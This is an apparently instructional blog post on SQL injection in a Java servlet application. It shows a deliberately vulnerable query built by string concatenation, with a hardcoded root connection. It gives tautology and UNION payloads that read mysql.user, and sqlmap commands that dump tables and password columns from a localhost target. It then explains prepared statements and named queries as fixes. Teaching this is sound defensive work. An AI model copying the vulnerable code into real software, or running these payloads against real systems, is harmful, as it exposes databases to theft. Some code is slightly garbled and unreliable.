In this post we will discuss what is an SQL Injection attack. and how its may affect any web application its use the back end database. Here i concentrate on java web application. Open Web Application Security Project(OWAP) listed that SQL Injection is the top vulnerability attack for web application. Hacker’s Inject the SQL code in web request to the web application and take the control of back end database, even that back end database is not directly connected to Internet. And we will see how to solve and prevent the SQL Injection in java Web Application.
For this purpose we need 1 tools. these tool are completely open source. SQL Map – SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL Injection. we can get it from here.

SQLInjection
SQL injection is the technique to extract the database information through web application.
Scenario:
We have one database server [MySQL] and web application server [Tomcat]. consider that database server is not connected to internet. but its connected with application server. Now we will see using web application how to extract the information using sql-injection method.
Before see the sql-injection, we create small web application. It contain single jsp page like this
1<form action='userCheck'>
2 
3<input type='text' name='user' value=''/>
4 
5<input type='submit' value='Submit'/>
6 
7</form>
In userCheck Servlet receives the user input field and connect to databse server and fire the sql query based on user input and receive the ResultSet and iterate it print into the web page.

userCheck servlet
01protected void processRequest(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {
02        response.setContentType('text/html;charset=UTF-8');
03        PrintWriter out = response.getWriter();
04        try {
05 
06            String user = request.getParameter('user');
07            Connection conn = null;
08            String url = 'jdbc:mysql://192.168.2.128:3306/';
09            String dbName = 'anvayaV2';
10            String driver = 'com.mysql.jdbc.Driver';
11            String userName = 'root';
12            String password = '';
13            try {
14                Class.forName(driver).newInstance();
15                conn = DriverManager.getConnection(url + dbName, userName, password);
16 
17                Statement st = conn.createStatement();
18                String query = 'SELECT * FROM  User where userId='' + user + ''';
19                out.println('Query : ' + query);
20                System.out.printf(query);
21                ResultSet res = st.executeQuery(query);
22 
23                out.println('Results');
24                while (res.next()) {
25                    String s = res.getString('username');
26                    out.println('\t\t' + s);
27                }
28                conn.close();
29 
30            catch (Exception e) {
31                e.printStackTrace();
32            }
33        finally {
34            out.close();
35        }
When we execute the above code. In normal input execution look like follows
When we give the normal value like ‘ramki’ then click the submit button then output like this
Its perfectly correct in normal behaviour. What happens when I put some special character or some sql statement in input box like this
when we click the submit button then it show all rows in my table like this
It is a big security breach in my application. what happened… is one kind of sql injection.
Let’s see what happened.
When I enter normal value in input box my servlet receives and substitute in the sql query and execute it.
1SELECT * FROM User where userId='ramki'
it’s correct and we got correct output.
What happens when I put sdfssd’ or ‘1’=’1
SELECT * FROM User where userId =’sdfssd’ or ‘1’=’1
its means
1SELECT * FROM User where userId ='sdfssd' or '1'='1'
like this. So our query is altered. now new query have 2 condition. 2nd condition always true. 1st condition may be or may not be true. but these 2 condition are connected with or logic. So where clause always true for all rows. the result is they bring all rows from our tables.
This is called blind sql injection. If u want more details of sql injection the check here
Now we can enter the sql statement directly in input box
like
ramki’ UNION SELECT * FROM mysql.`user` u —
then
SELECT * FROM User where userId=’ramki’ UNION SELECT * FROM mysql.`user` u —
then its means
1SELECT * FROM User where userId ='ramki' UNION SELECT * FROM mysql.`user` u --'
Here they wont use * because its not matched with first table. So they find how many columns then use Union with second table.the user particular column they want. As result the get mysql database user information its exposed through our web application.
sqlmap
It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database
Install the sqlmap in ur system or use BackTrack Linux
Here I used backtrack linux, because it’s already pre installed lots of applications like sqlmap.
In backtrack, sqlmap is located in /pentest/web/scanner/sqlmap
sqlmap commands
retrieve all databases
retrieve all tables
1./sqlmap.py -u http://localhost:8080/SQLInject/userCheck?user=ramki -D test --tables
retrieve all columns from particular table
1./sqlmap.py -u http://localhost:8080/SQLInject/userCheck?user=ramki -D test -T User --columns
Dump all column valued from particular table
1./sqlmap.py -u http://localhost:8080/SQLInject/userCheck?user=ramki -D test -T User --dump
Dump some column valued from particular table
1./sqlmap.py -u http://localhost:8080/SQLInject/userCheck?user=ramki -D test -T User -C userId,password --dump
See the video for full demo (watch in HD):
How To Prevent SQL Injection
  • Before substitute into query, we need to do the validation. for remove ir escaped the special character like single quote, key words like select, Union…
  • Use Prepared Statement with placeholder
1PreparedStatement  preparedStatement=conn.prepareStatement('SELECT * FROM  usercheck where username=?') ;
2preparedStatement.setString(1, user);
that setXXX() method do all the validation and escaping the special charcter
Now if use same blind sql injection like
sdfssd’ or ‘1’=’1 then
1SELECT * FROM User where userId='sdfssd\' or \'1\'=\'1'
Here all special character are escaped When we use JPA kind of ORM tools like Hibernate, EclipseLink, TopLink that time also may be sqlinjection is possible.
To prevent the SQL injection we need to use NamedQuery instead of normal Query. Because NamedQuery internally used PreparedStement but normal query used norma Stement in java.
Normal Query in JPA
1String q='SELECT r FROM  User r where r.userId=''+user+''';
2Query query=em.createQuery(q);
3List users=query.getResultList();
So don’t use normal query, use Named query like this
1Query query=em.createNamedQuery('User.findByUserId');
2query.setParameter('userId', user);
3List users=query.getResultList();
  

0 comments :

Post a Comment

 
Top